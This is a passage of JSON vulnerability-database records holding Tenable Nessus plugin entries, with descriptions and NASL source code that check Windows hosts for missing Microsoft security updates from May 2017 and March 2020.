"SMB_NT_MS17-MAY_4019214.NASL", "href": "https://www.tenable.com/plugins/nessus/100054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100054);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0238\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98102,\n 98103,\n 98111,\n 98127,\n 98139,\n 98237,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019214\");\n script_xref(name:\"MSKB\", value:\"4019216\");\n script_xref(name:\"MSFT\", value:\"MS17-4019214\");\n script_xref(name:\"MSFT\", value:\"MS17-4019216\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows Server 2012 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019214\nor cumulative update 4019216. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019214/windows-server-2012-update-kb4019214\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ae1f0e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019214 or Cumulative update KB4019216.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019214', # 2012 Monthly Rollup\n '4019216' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019214,4019216]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:09:27", "description": "The remote Windows host is missing security update 4019263 or cumulative update 4019264. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0231", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019264.NASL", "href": "https://www.tenable.com/plugins/nessus/100058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100058);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0231\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98110,\n 98111,\n 98127,\n 98173,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019263\");\n script_xref(name:\"MSKB\", value:\"4019264\");\n script_xref(name:\"MSFT\", value:\"MS17-4019263\");\n script_xref(name:\"MSFT\", value:\"MS17-4019264\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019263\nor cumulative update 4019264. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n # https://support.microsoft.com/en-us/help/4019264/windows-7-update-kb4019264\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89dd1a9e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019263 or Cumulative update KB4019264.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft\nbulletin = 'MS17-05';\nkbs = make_list(\"4019264\", \"4019263\");\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Window 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:[4019264, 4019263])\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:28:16", "description": "The remote Windows host is missing security update 4541504 or cumulative update 4541506. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0880, CVE-2020-0882)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; 